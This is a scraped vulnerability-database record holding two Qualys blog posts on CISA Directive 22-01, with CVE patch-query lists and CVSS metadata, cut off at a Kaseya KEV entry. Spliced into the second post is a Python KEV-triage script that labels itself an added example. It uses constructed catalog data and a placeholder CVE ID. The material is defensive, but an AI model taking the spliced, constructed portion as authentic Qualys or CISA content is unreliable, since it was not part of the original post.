Running this query will find all required patches and allow quick and efficient deployment of those missing patches to all assets directly from within the Qualys Cloud Platform.\n\ncve:[`CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]\n\n\n\nQualys patch content covers many Microsoft, Linux, and third-party applications; however, some of the vulnerabilities introduced by CISA are not 
currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch the remaining CVEs in this list.\n\nNote that the due date for \u201cCategory 1\u201d patches has already passed. To find missing patches in your environment for \u201cCategory 1\u201d past-due CVEs, copy the following query into the Patch Management app:\n\ncve:[`CVE-2021-1732`,`CVE-2020-1350`,`CVE-2020-1472`,`CVE-2021-26855`,`CVE-2021-26858`,`CVE-2021-27065`,`CVE-2020-0601`,`CVE-2021-26857`,`CVE-2021-22893`,`CVE-2020-8243`,`CVE-2021-22900`,`CVE-2021-22894`,`CVE-2020-8260`,`CVE-2021-22899`,`CVE-2019-11510`]\n\n\n\n## Federal Enterprises and Agencies Can Act Now\n\nFor federal enterprises and agencies, it's a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>).\n\nHere are a few steps Federal enterprises can take immediately:\n\n * Run vulnerability assessments against all your assets by leveraging various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Patch Management to apply patches and other configuration changes\n * Track remediation progress through Unified Dashboards\n\n## Summary\n\nUnderstanding which vulnerabilities you have is a critical but only partial step in threat mitigation. Qualys VMDR helps customers discover exposure, assess threats, assign risk, and remediate threats in one solution. 
Qualys customers rely on the accuracy of Qualys' threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any organization efficiently respond to the CISA directive.\n\n## Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-09T06:15:01", "type": "qualysblog", "title": "Qualys Response to CISA Alert: Binding Operational Directive 22-01", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2020-0601", "CVE-2020-1350", "CVE-2020-1472", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-1782", "CVE-2021-1870", "CVE-2021-1871", "CVE-2021-1879", "CVE-2021-1905", "CVE-2021-1906", "CVE-2021-20016", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", 
"CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-21972", "CVE-2021-21985", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-22502", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-22986", "CVE-2021-26084", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-28663", "CVE-2021-28664", "CVE-2021-30116", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-30657", "CVE-2021-30661", "CVE-2021-30663", "CVE-2021-30665", "CVE-2021-30666", "CVE-2021-30713", "CVE-2021-30761", "CVE-2021-30762", "CVE-2021-30807", "CVE-2021-30858", "CVE-2021-30860", "CVE-2021-30869", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40444", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42258"], "modified": "2021-11-09T06:15:01", "id": "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-25T19:27:09", "description": "_CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. 
This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively._\n\n### Situation\n\nLast November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>) called \u201cReducing the Significant Risk of Known Exploited Vulnerabilities.\u201d [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of Known Exploited Vulnerabilities that carry significant risk to the federal government and sets requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires federal agencies to review and update internal vulnerability management procedures to remediate each vulnerability according to the timelines outlined in CISA\u2019s vulnerability catalog.\n\n### Directive Scope\n\nThis CISA directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency\u2019s behalf.\n\nHowever, CISA strongly recommends that public and private businesses as well as state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA\u2019s public catalog. This is truly vulnerability management guidance for all organizations to heed.\n\n### CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [379 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. 
CISA\u2019s most recent update was issued on February 22, 2022.\n\nThe Qualys Research team continuously maps newly catalogued CVEs to QIDs (Qualys vulnerability identifiers) in the Qualys Knowledgebase and tags them with the RTI \u201cCISA Exploited\u201d. This is an ongoing effort, since CISA regularly adds CVEs to the catalog as part of its feeds.\n\nDirective 22-01 urges all organizations to reduce their exposure to cyberattacks by prioritizing the remediation of the catalogued vulnerabilities.\n\nCISA has ordered U.S. federal agencies to apply patches as soon as possible. CISA groups the remediation guidance into multiple categories based on attack surface severity and time-to-remediate. The due date for each CVE is listed in the [Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n\n### Detect CISA Vulnerabilities Using Qualys VMDR\n\nQualys helps customers identify and assess the risk to their organizations\u2019 digital infrastructure, and then automate remediation. Qualys\u2019 guidance for rapid response to Directive 22-01 follows.\n\nThe Qualys Research team has released multiple remote and authenticated detections (QIDs) for these vulnerabilities. Since the directive includes 379 CVEs (as of February 22, 2022), we recommend searching with QQL (Qualys Query Language) rather than by individual CVE; the following query returns every released QID that Qualys has tagged as CISA-exploited: **_vulnerabilities.vulnerability.threatIntel.cisaKnownExploitedVulns:"true"_**\n\n\n\n### CISA Exploited RTI\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using VMDR Prioritization. 
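The prioritization the directive asks for is, at bottom, a join between the catalog and your own findings: each catalogued CVE carries a due date, and every finding on one of your assets inherits that deadline. The following is an added example (not Qualys code and not part of the original post) of that join done with nothing but the standard library. The catalog snapshot reuses the field names of CISA's KEV JSON feed (`cveID`, `vendorProject`, `product`, `dateAdded`, `dueDate`) but its entries and due dates are constructed for illustration, as is the scanner export; `CVE-2021-99999` is a placeholder, not a real identifier.

```python
import json
from datetime import date

# Constructed KEV-style catalog snapshot. Field names follow the CISA KEV JSON
# feed; the entries and due dates are illustrative, not copied from CISA.
KEV_SNAPSHOT = json.dumps({
    'title': 'Known Exploited Vulnerabilities catalog (constructed sample)',
    'vulnerabilities': [
        {'cveID': 'CVE-2019-11510', 'vendorProject': 'Pulse Secure',
         'product': 'Pulse Connect Secure', 'dateAdded': '2021-11-03', 'dueDate': '2021-11-03'},
        {'cveID': 'CVE-2020-1472', 'vendorProject': 'Microsoft',
         'product': 'Netlogon', 'dateAdded': '2021-11-03', 'dueDate': '2021-11-03'},
        {'cveID': 'CVE-2021-30116', 'vendorProject': 'Kaseya',
         'product': 'VSA', 'dateAdded': '2021-11-03', 'dueDate': '2021-11-17'},
        {'cveID': 'CVE-2017-0144', 'vendorProject': 'Microsoft',
         'product': 'SMBv1', 'dateAdded': '2021-11-03', 'dueDate': '2022-05-03'},
    ],
})

# Constructed scanner export: one (host, CVE) finding per row.
FINDINGS = [
    {'host': 'vsa01.corp.example', 'cve': 'CVE-2021-30116'},
    {'host': 'vpn.corp.example', 'cve': 'CVE-2019-11510'},
    {'host': 'dc01.corp.example', 'cve': 'CVE-2020-1472'},
    {'host': 'fs02.corp.example', 'cve': 'CVE-2017-0144'},
    {'host': 'web03.corp.example', 'cve': 'CVE-2021-99999'},  # placeholder ID, not in the catalog
]


def load_catalog(kev_json):
    '''Index a KEV catalog document (the JSON feed layout) by CVE ID.'''
    doc = json.loads(kev_json)
    return {v['cveID']: v for v in doc['vulnerabilities']}


def triage(findings, catalog, as_of, soon_days=14):
    '''Attach the catalog due date to each finding and bucket it.

    as_of is an ISO date string. Buckets: PAST_DUE (deadline missed),
    DUE_SOON (within soon_days), SCHEDULED (later), NOT_IN_KEV (no directive
    deadline). Rows come back ordered by urgency: past due first, then the
    nearest deadline, with non-catalog findings last.
    '''
    today = date.fromisoformat(as_of)
    rows = []
    for finding in findings:
        entry = catalog.get(finding['cve'])
        if entry is None:
            rows.append({**finding, 'due': None, 'days_left': None, 'status': 'NOT_IN_KEV'})
            continue
        days_left = (date.fromisoformat(entry['dueDate']) - today).days
        if days_left < 0:
            status = 'PAST_DUE'
        elif days_left <= soon_days:
            status = 'DUE_SOON'
        else:
            status = 'SCHEDULED'
        rows.append({**finding, 'product': entry['product'], 'due': entry['dueDate'],
                     'days_left': days_left, 'status': status})
    # ISO dates sort correctly as strings; None (not in catalog) goes last.
    rows.sort(key=lambda r: (r['due'] is None, r['due'] or ''))
    return rows


def summarize(rows):
    '''Count findings per bucket, the number a dashboard widget would show.'''
    counts = {}
    for r in rows:
        counts[r['status']] = counts.get(r['status'], 0) + 1
    return counts


if __name__ == '__main__':
    rows = triage(FINDINGS, load_catalog(KEV_SNAPSHOT), as_of='2021-11-09')
    for r in rows:
        print('{:<10} {:<15} {:<20} due={}'.format(r['status'], r['cve'], r['host'], r['due']))
    print(summarize(rows))
```

Run against the real feed, the only change is reading the catalog JSON from disk instead of the embedded snapshot; the `as_of` parameter is explicit so that the same export can be re-scored against a future date to see what will fall past due next.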
Qualys has introduced an **RTI Category, CISA Exploited**.\n\nThis RTI indicates that the vulnerabilities are associated with the CISA catalog.\n\n\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n\n\nWith Qualys Unified Dashboard, you can track your exposure to CISA Known Exploited Vulnerabilities and track your status and overall management in real-time. With dashboard widgets, you can keep track of the status of vulnerabilities in your environment using the [\u201cCISA 2010-21| KNOWN EXPLOITED VULNERABILITIES\u201d](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard\n\n\n\n### Remediation\n\nTo comply with this directive, federal agencies need to remediate all vulnerabilities as per the remediation timelines in the [CISA Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n\nQualys patch content covers many Microsoft, Linux, and third-party applications. However, some of the vulnerabilities introduced by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch all the remaining CVEs in their list.\n\nCustomers can copy the following query into the Patch Management app to meet the aggressive remediation timelines set by CISA. 
Running this query for specific CVEs will find required patches and allow quick and efficient deployment of those missing patches to all assets directly from within Qualys Cloud Platform.\n \n \n cve:[`CVE-2010-5326`,`CVE-2012-0158`,`CVE-2012-0391`,`CVE-2012-3152`,`CVE-2013-3900`,`CVE-2013-3906`,`CVE-2014-1761`,`CVE-2014-1776`,`CVE-2014-1812`,`CVE-2015-1635`,`CVE-2015-1641`,`CVE-2015-4852`,`CVE-2016-0167`,`CVE-2016-0185`,`CVE-2016-3088`,`CVE-2016-3235`,`CVE-2016-3643`,`CVE-2016-3976`,`CVE-2016-7255`,`CVE-2016-9563`,`CVE-2017-0143`,`CVE-2017-0144`,`CVE-2017-0145`,`CVE-2017-0199`,`CVE-2017-0262`,`CVE-2017-0263`,`CVE-2017-10271`,`CVE-2017-11774`,`CVE-2017-11882`,`CVE-2017-5638`,`CVE-2017-5689`,`CVE-2017-6327`,`CVE-2017-7269`,`CVE-2017-8464`,`CVE-2017-8759`,`CVE-2017-9791`,`CVE-2017-9805`,`CVE-2017-9841`,`CVE-2018-0798`,`CVE-2018-0802`,`CVE-2018-1000861`,`CVE-2018-11776`,`CVE-2018-15961`,`CVE-2018-15982`,`CVE-2018-2380`,`CVE-2018-4878`,`CVE-2018-4939`,`CVE-2018-6789`,`CVE-2018-7600`,`CVE-2018-8174`,`CVE-2018-8453`,`CVE-2018-8653`,`CVE-2019-0193`,`CVE-2019-0211`,`CVE-2019-0541`,`CVE-2019-0604`,`CVE-2019-0708`,`CVE-2019-0752`,`CVE-2019-0797`,`CVE-2019-0803`,`CVE-2019-0808`,`CVE-2019-0859`,`CVE-2019-0863`,`CVE-2019-10149`,`CVE-2019-10758`,`CVE-2019-11510`,`CVE-2019-11539`,`CVE-2019-1214`,`CVE-2019-1215`,`CVE-2019-1367`,`CVE-2019-1429`,`CVE-2019-1458`,`CVE-2019-16759`,`CVE-2019-17026`,`CVE-2019-17558`,`CVE-2019-18187`,`CVE-2019-18988`,`CVE-2019-2725`,`CVE-2019-8394`,`CVE-2019-9978`,`CVE-2020-0601`,`CVE-2020-0646`,`CVE-2020-0674`,`CVE-2020-0683`,`CVE-2020-0688`,`CVE-2020-0787`,`CVE-2020-0796`,`CVE-2020-0878`,`CVE-2020-0938`,`CVE-2020-0968`,`CVE-2020-0986`,`CVE-2020-10148`,`CVE-2020-10189`,`CVE-2020-1020`,`CVE-2020-1040`,`CVE-2020-1054`,`CVE-2020-1147`,`CVE-2020-11738`,`CVE-2020-11978`,`CVE-2020-1350`,`CVE-2020-13671`,`CVE-2020-1380`,`CVE-2020-13927`,`CVE-2020-1464`,`CVE-2020-1472`,`CVE-2020-14750`,`CVE-2020-14871`,`CVE-2020-14882`,`CVE-2020-14883`,`CVE-2020-15505`,`CVE-2020-
15999`,`CVE-2020-16009`,`CVE-2020-16010`,`CVE-2020-16013`,`CVE-2020-16017`,`CVE-2020-17087`,`CVE-2020-17144`,`CVE-2020-17496`,`CVE-2020-17530`,`CVE-2020-24557`,`CVE-2020-25213`,`CVE-2020-2555`,`CVE-2020-6207`,`CVE-2020-6287`,`CVE-2020-6418`,`CVE-2020-6572`,`CVE-2020-6819`,`CVE-2020-6820`,`CVE-2020-8243`,`CVE-2020-8260`,`CVE-2020-8467`,`CVE-2020-8468`,`CVE-2020-8599`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-22204`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33766`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-35247`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36934`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37415`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40438`,`CVE-2021-40444`,`CVE-2021-40449`,`CVE-2021-40539`,`CVE-2021-4102`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42292`,`CVE-2021-42321`,`CVE-2021-43890`,`CVE-2021-44077`,`CVE-2021-44228`,`CVE-2021-44515`,`CVE-2022-0609`,`CVE-2022-21882`,`CVE-2022-24086`,`CVE-2010-1871`,`CVE-2017-12149`,`CVE-2019-13272` ]\n\n\n\nVulnerabilities can be validated through VMDR and a Patch Job can be configured for vulnerable assets.\n\n\n\n### Federal Enterprises and Agencies Can Act Now\n\nFor federal agencies and enterprises, it\u2019s a race against time to remediate these 
vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help your organization to achieve compliance with this binding directive. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>) to our credit.\n\nHere are a few steps Federal entities can take immediately:\n\n * Run vulnerability assessments against all of your assets by leveraging our various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Qualys Patch Management to apply patches and other configuration changes\n * Track remediation progress through our Unified Dashboards\n\n### Summary\n\nUnderstanding just which vulnerabilities exist in your environment is a critical but small part of threat mitigation. Qualys VMDR helps customers discover their exposure, assess threats, assign risk, and remediate threats \u2013 all in a single unified solution. Qualys customers rely on the accuracy of Qualys\u2019 threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any size organization efficiently respond to CISA Binding Operational Directive 22-01.\n\n#### Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? 
Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-23T05:39:00", "type": "qualysblog", "title": "Managing CISA Known Exploited Vulnerabilities with Qualys VMDR", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1871", "CVE-2010-5326", "CVE-2012-0158", "CVE-2012-0391", "CVE-2012-3152", "CVE-2013-3900", "CVE-2013-3906", "CVE-2014-1761", "CVE-2014-1776", "CVE-2014-1812", "CVE-2015-1635", "CVE-2015-1641", "CVE-2015-4852", "CVE-2016-0167", "CVE-2016-0185", "CVE-2016-3088", "CVE-2016-3235", "CVE-2016-3643", "CVE-2016-3976", "CVE-2016-7255", "CVE-2016-9563", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0199", "CVE-2017-0262", "CVE-2017-0263", "CVE-2017-10271", "CVE-2017-11774", "CVE-2017-11882", "CVE-2017-12149", "CVE-2017-5638", "CVE-2017-5689", "CVE-2017-6327", "CVE-2017-7269", "CVE-2017-8464", "CVE-2017-8759", "CVE-2017-9791", "CVE-2017-9805", "CVE-2017-9841", "CVE-2018-0798", "CVE-2018-0802", "CVE-2018-1000861", "CVE-2018-11776", "CVE-2018-15961", "CVE-2018-15982", "CVE-2018-2380", 
"CVE-2018-4878", "CVE-2018-4939", "CVE-2018-6789", "CVE-2018-7600", "CVE-2018-8174", "CVE-2018-8453", "CVE-2018-8653", "CVE-2019-0193", "CVE-2019-0211", "CVE-2019-0541", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-0752", "CVE-2019-0797", "CVE-2019-0803", "CVE-2019-0808", "CVE-2019-0859", "CVE-2019-0863", "CVE-2019-10149", "CVE-2019-10758", "CVE-2019-11510", "CVE-2019-11539", "CVE-2019-1214", "CVE-2019-1215", "CVE-2019-13272", "CVE-2019-1367", "CVE-2019-1429", "CVE-2019-1458", "CVE-2019-16759", "CVE-2019-17026", "CVE-2019-17558", "CVE-2019-18187", "CVE-2019-18988", "CVE-2019-2725", "CVE-2019-8394", "CVE-2019-9978", "CVE-2020-0601", "CVE-2020-0646", "CVE-2020-0674", "CVE-2020-0683", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-0796", "CVE-2020-0878", "CVE-2020-0938", "CVE-2020-0968", "CVE-2020-0986", "CVE-2020-10148", "CVE-2020-10189", "CVE-2020-1020", "CVE-2020-1040", "CVE-2020-1054", "CVE-2020-1147", "CVE-2020-11738", "CVE-2020-11978", "CVE-2020-1350", "CVE-2020-13671", "CVE-2020-1380", "CVE-2020-13927", "CVE-2020-1464", "CVE-2020-1472", "CVE-2020-14750", "CVE-2020-14871", "CVE-2020-14882", "CVE-2020-14883", "CVE-2020-15505", "CVE-2020-15999", "CVE-2020-16009", "CVE-2020-16010", "CVE-2020-16013", "CVE-2020-16017", "CVE-2020-17087", "CVE-2020-17144", "CVE-2020-17496", "CVE-2020-17530", "CVE-2020-24557", "CVE-2020-25213", "CVE-2020-2555", "CVE-2020-6207", "CVE-2020-6287", "CVE-2020-6418", "CVE-2020-6572", "CVE-2020-6819", "CVE-2020-6820", "CVE-2020-8243", "CVE-2020-8260", "CVE-2020-8467", "CVE-2020-8468", "CVE-2020-8599", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-22204", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-30116", 
"CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33766", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-35247", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36934", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37415", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40438", "CVE-2021-40444", "CVE-2021-40449", "CVE-2021-40539", "CVE-2021-4102", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42292", "CVE-2021-42321", "CVE-2021-43890", "CVE-2021-44077", "CVE-2021-44228", "CVE-2021-44515", "CVE-2022-0609", "CVE-2022-21882", "CVE-2022-24086"], "modified": "2022-02-23T05:39:00", "id": "QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Kaseya VSA before 9.5.7 allows credential disclosure, as exploited in the wild in July 2021.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Kaseya VSA Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, 
